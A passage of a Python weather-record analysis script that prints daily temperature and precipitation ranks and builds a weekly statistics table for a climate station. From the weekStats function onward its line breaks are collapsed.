                ", Flag: {} - {}".format(dayobj.snwdQ,qflagCheck(dayobj.snwdQ)) if dayobj.snwdQ != "" else "",
                ", Rank: {}".format(rank(snwdhist.index(round(float(dayobj.snwd),1))+1)) if dayobj.snwdQ in ignoreflags else ""))
        # TAVG = mean of TMAX/TMIN, shown only when both are present with
        # acceptable flags.  A value ranks "Warmest" when its index in the
        # descending list is <= its index in the ascending list (warm half)
        # and "Coolest" symmetrically; an exact mid-list value prints both.
        print("TAVG: {}{}{}".format(
            "{:4.1f}".format(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) if all(T != "" for T in [dayobj.tmax,dayobj.tmin]) and all(Q in ignoreflags for Q in [dayobj.tmaxQ,dayobj.tminQ]) else "N/A",
            ", Rank: {} Warmest".format(
                rank(tavgdeschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1))+1)) if all(T != "" for T in [dayobj.tmax,dayobj.tmin]) and all(Q in ignoreflags for Q in [dayobj.tmaxQ,dayobj.tminQ]) and tavgdeschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) <= tavgaschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) else "",
            ", Rank: {} Coolest".format(
                rank(tavgaschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1))+1)) if all(T != "" for T in [dayobj.tmax,dayobj.tmin]) and all(Q in ignoreflags for Q in [dayobj.tmaxQ,dayobj.tminQ]) and tavgaschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) <= tavgdeschist.index(round(mean([float(dayobj.tmax),float(dayobj.tmin)]),1)) else ""
            ))
        # NOTE(review): the rank arms below gate on tmaxQ/tminQ in ignoreflags,
        # but the histories only include empty-flag records; a non-empty
        # ignored flag would make .index() raise ValueError -- confirm.
        print("TMAX: {}{}{}{}".format(
            dayobj.tmax if dayobj.tmax != "" else "N/A",
            ", Flag: {} - {}".format(dayobj.tmaxQ,qflagCheck(dayobj.tmaxQ)) if dayobj.tmaxQ != "" else "",
            ", Rank: {} Warmest".format(rank(tmaxdeschist.index(int(dayobj.tmax))+1)) if dayobj.tmax != "" and dayobj.tmaxQ in ignoreflags and tmaxdeschist.index(int(dayobj.tmax)) <= tmaxaschist.index(int(dayobj.tmax)) else "",
            ", Rank: {} Coolest".format(rank(tmaxaschist.index(int(dayobj.tmax))+1)) if dayobj.tmax != "" and dayobj.tmaxQ in ignoreflags and tmaxaschist.index(int(dayobj.tmax)) <= tmaxdeschist.index(int(dayobj.tmax)) else ""
            ))
        print("TMIN: {}{}{}{}".format(
            dayobj.tmin if dayobj.tmin != "" else "N/A",
            ", Flag: {} - {}".format(dayobj.tminQ,qflagCheck(dayobj.tminQ)) if dayobj.tminQ != "" else "",
            ", Rank: {} Warmest".format(rank(tmindeschist.index(int(dayobj.tmin))+1)) if dayobj.tmin != "" and dayobj.tminQ in ignoreflags and tmindeschist.index(int(dayobj.tmin)) <= tminaschist.index(int(dayobj.tmin)) else "",
            ", Rank: {} Coolest".format(rank(tminaschist.index(int(dayobj.tmin))+1)) if dayobj.tmin != "" and dayobj.tminQ in ignoreflags and tminaschist.index(int(dayobj.tmin)) <= tmindeschist.index(int(dayobj.tmin)) else ""
            ))
        # Data sanity check; non-numeric or missing temps are deliberately
        # ignored (bare except) rather than failing the report.
        try:
            if int(dayobj.tmax) < int(dayobj.tmin): print("*** CHECK DATA: TMIN > TMAX ***")
        except: pass
        print("")

def weekStats(y,m,d):
    """Report on recorded statistics for a week of interest.
The week will be centered on the day passed as an argument. Passed arguments MUST be integers. weekStats(year,month,day) EXAMPLE: weekStats(1992,12,29) -> Returns a printout of weekly-based statistics centered on December 29, 1992 (The week would be inclusive 3 days before and after the date """ if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") ranks = ["th","st","nd","rd","th","th","th","th","th","th"] if m == 2 and d == 29: m = 2; d = 28 wkstart = datetime.date(y,m,d) - datetime.timedelta(days=3) c = wkstart wkend = datetime.date(y,m,d) + datetime.timedelta(days=3) #print(st) #print(datetime.date(y,m,d)) #print(en) w_prcp = [] w_prcpDAYS = 0 w_snow = [] w_snowDAYS = 0 w_snwd = [] w_tmax = [] w_tmin = [] w_alltemps = [] records_in_week = 0 weekExists = checkDate(y,m,d) indvweekdays = [] if m == 2 and d == 29: m = 2; d = 28 if weekExists: print("") for x in range(7): indvweekdays.append(c) try: #round(float(clmt[DY.year][DY.month][DY.day].prcp),2) for DY in indvweekdays if checkDate(DY.year,DY.month,DY.day) and clmt[DY.year][DY.month][DY.day].prcp != "" and clmt[DY.year][DY.month][DY.day].prcpQ in ignoreflags if clmt[c.year][c.month][c.day]: records_in_week += 1 if clmt[c.year][c.month][c.day].prcpQ in ignoreflags and clmt[c.year][c.month][c.day].prcp not in ["9999","-9999",""]: w_prcp.append(round(float(clmt[c.year][c.month][c.day].prcp),2)) if float(clmt[c.year][c.month][c.day].prcp) > 0 or clmt[c.year][c.month][c.day].prcpM == "T": w_prcpDAYS += 1 if clmt[c.year][c.month][c.day].snowQ in ignoreflags and clmt[c.year][c.month][c.day].snow not in ["9999","-9999",""]: w_snow.append(round(float(clmt[c.year][c.month][c.day].snow),1)) if float(clmt[c.year][c.month][c.day].snow) > 0 or clmt[c.year][c.month][c.day].snowM == "T": w_snowDAYS += 1 if clmt[c.year][c.month][c.day].snwdQ in ignoreflags and clmt[c.year][c.month][c.day].snwd not in ["9999","-9999",""]: w_snwd.append(round(float(clmt[c.year][c.month][c.day].snwd),1)) if 
clmt[c.year][c.month][c.day].tmaxQ in ignoreflags and clmt[c.year][c.month][c.day].tmax not in ["9999","-9999",""]: w_tmax.append(int(clmt[c.year][c.month][c.day].tmax)) if clmt[c.year][c.month][c.day].tminQ in ignoreflags and clmt[c.year][c.month][c.day].tmin not in ["9999","-9999",""]: w_tmin.append(int(clmt[c.year][c.month][c.day].tmin)) if clmt[c.year][c.month][c.day].tmaxQ in ignoreflags and clmt[c.year][c.month][c.day].tmax not in ["9999","-9999",""] and clmt[c.year][c.month][c.day].tminQ in ignoreflags and clmt[c.year][c.month][c.day].tmin not in ["9999","-9999",""]: w_alltemps.append(int(clmt[c.year][c.month][c.day].tmax)) w_alltemps.append(int(clmt[c.year][c.month][c.day].tmin)) except KeyError: continue c += datetime.timedelta(days=1) # indvweekdays complete above # The following compiles all time data to display ranks in the output prcphist = [] snowhist = [] snwdhist = [] tmaxaschist = [] tmaxdeschist = [] tminaschist = [] tmindeschist = [] tavgaschist = [] tavgdeschist = [] for YR in [YYYY for YYYY in clmt if type(YYYY) == int]: wc = datetime.date(YR,m,d) ws = wc - datetime.timedelta(days=3) wd = ws # current day we = wc + datetime.timedelta(days=3) tempwkli = [] # tempwkli = [datetime.date(2009,1,1),datetime.date(2009,1,2),datetime.date(2009,1,3),datetime.date(2009,1,4),datetime.date(2009,1,5),datetime.date(2009,1,6),datetime.date(2009,1,7)] while wd <= we: tempwkli.append(datetime.date(wd.year,wd.month,wd.day)) wd = wd + datetime.timedelta(days=1) prcpwk = [float(clmt[wkday.year][wkday.month][wkday.day].prcp) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].prcp not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].prcpQ in ignoreflags] prcphist.append(round(sum(prcpwk),2)) snowwk = [float(clmt[wkday.year][wkday.month][wkday.day].snow) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].snow 
not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].snowQ in ignoreflags] snowhist.append(round(sum(snowwk),1)) snwdwk = [float(clmt[wkday.year][wkday.month][wkday.day].snwd) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].snwd not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].snwdQ in ignoreflags] if len(snwdwk) > 0: snwdhist.append(round(sum(snwdwk)/7,1)) tmaxwk = [int(clmt[wkday.year][wkday.month][wkday.day].tmax) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].tmax not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].tmaxQ in ignoreflags] if len(tmaxwk) > excludeweek: tmaxaschist.append(round(mean(tmaxwk),1)) tmaxdeschist.append(round(mean(tmaxwk),1)) tminwk = [int(clmt[wkday.year][wkday.month][wkday.day].tmin) for wkday in tempwkli if checkDate2(wkday.year,wkday.month,wkday.day) and clmt[wkday.year][wkday.month][wkday.day].tmin not in ["","-9999","9999","-999","999"] and clmt[wkday.year][wkday.month][wkday.day].tminQ in ignoreflags] if len(tminwk) > excludeweek: tminaschist.append(round(mean(tminwk),1)) tmindeschist.append(round(mean(tminwk),1)) tavgwk = [] for evd in tempwkli: if checkDate2(evd.year,evd.month,evd.day) and clmt[evd.year][evd.month][evd.day].tmax not in ["","-9999","9999","-999","999"] and clmt[evd.year][evd.month][evd.day].tmin not in ["","-9999","9999","-999","999"] and clmt[evd.year][evd.month][evd.day].tmaxQ in ignoreflags and clmt[evd.year][evd.month][evd.day].tminQ in ignoreflags: tavgwk.append(int(clmt[evd.year][evd.month][evd.day].tmax)) tavgwk.append(int(clmt[evd.year][evd.month][evd.day].tmin)) if len(tavgwk) > excludeweek * 2: tavgaschist.append(round(mean(tavgwk),1)) tavgdeschist.append(round(mean(tavgwk),1)) """ print("{} - prcp: {} :: snow: {} :: snwd avg: {} :: tavg: {} :: tmax avg: {} :: tmin avg: 
{}".format( YR, "{:5.2f}".format(round(sum(prcpwk),2)), "{:5.1f}".format(round(sum(snowwk),1)), "{:5.1f}".format(round(mean(snwdwk),1)) if len(snwdwk) > 0 else "--", "{:5.1f}".format(round(mean(tavgwk),1)) if len(tavgwk) > 0 else "--", "{:5.1f}".format(round(mean(tmaxwk),1)) if len(tmaxwk) > 0 else "--", "{:5.1f}".format(round(mean(tminwk),1)) if len(tminwk) > 0 else "--")) """ prcphist = sorted(list(set(prcphist)),reverse=True) snowhist = sorted(list(set(snowhist)),reverse=True) snwdhist = sorted(list(set(snwdhist)),reverse=True) tmaxaschist = sorted(list(set(tmaxaschist))) tmaxdeschist = sorted(list(set(tmaxdeschist)),reverse=True) tminaschist = sorted(list(set(tminaschist))) tmindeschist = sorted(list(set(tmindeschist)),reverse=True) tavgaschist = sorted(list(set(tavgaschist))) tavgdeschist = sorted(list(set(tavgdeschist)),reverse=True) #for x in [prcphist,snowhist,snwdhist,tmaxaschist,tmaxdeschist,tminaschist,tmindeschist,tavgaschist,tavgdeschist]: print(x) if records_in_week <= excludeweek: print("") print("{:-^83}".format("*** WEEKLY STATS LIKELY UNDERREPRESENTED ***")) print("{:^83}".format("Weekly Statistics for {} thru {}".format(wkstart,wkend))) print("{:^83}".format("{}: {}".format(clmt["station"],clmt["station_name"]))) print("{:^83}".format("Quantity of Records: {}".format(records_in_week))) print("{:^83}".format("'*' Denotes existance of quality flag; not included in average stats")) print("{:-^83}".format("")) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("",indvweekdays[0].year,indvweekdays[1].year,indvweekdays[2].year,indvweekdays[3].year,indvweekdays[4].year,indvweekdays[5].year,indvweekdays[6].year)) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("", "{} {}".format(calendar.month_abbr[indvweekdays[0].month],indvweekdays[0].day), "{} {}".format(calendar.month_abbr[indvweekdays[1].month],indvweekdays[1].day), "{} {}".format(calendar.month_abbr[indvweekdays[2].month],indvweekdays[2].day), "{} 
{}".format(calendar.month_abbr[indvweekdays[3].month],indvweekdays[3].day), "{} {}".format(calendar.month_abbr[indvweekdays[4].month],indvweekdays[4].day), "{} {}".format(calendar.month_abbr[indvweekdays[5].month],indvweekdays[5].day), "{} {}".format(calendar.month_abbr[indvweekdays[6].month],indvweekdays[6].day))) print("{:-^6}|{:-^10}|{:-^10}|{:-^10}|{:-^10}|{:-^10}|{:-^10}|{:-^10}".format("","","","","","","","")) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("PRCP", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcp if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcp != "" else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcpM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcp if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcp != "" else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcpM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcp if 
checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcp != "" else "M", clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcpM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcp if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcp != "" else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcpM if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcp if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcp != "" else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcpM if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].prcpQ != "" else ""), 
"{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcp if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcp != "" else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcpM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].prcpQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].prcp if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].prcp != "" else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].prcpM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].prcpM == "T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].prcpQ != "" else ""))) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("SNOW", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snow if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snowM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and 
clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snow if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snowM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snow if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) else "M", clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snowM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snow if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snowM if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snowQ != "" else ""), "{}{}{}".format( 
clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snow if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snowM if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snow if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snowM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snowQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snow if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snowM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snowM == "T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snowQ != "" else ""))) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("SNWD", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snwd if 
checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snwdM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snwd if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snwdM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snwd if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) else "M", clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snwdM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snwd if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snwdM 
if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snwd if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snwdM if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snwd if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snwdM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snwdM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].snwdQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snwd if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snwdM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snwdM == 
"T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].snwdQ != "" else ""))) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("TMAX", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmax if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmax != "" else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmaxM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmax if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmax != "" else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmaxM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmax if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmax != "" else "M", 
clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmaxM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmax if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmax != "" else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmaxM if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmax if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmax != "" else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmaxM if 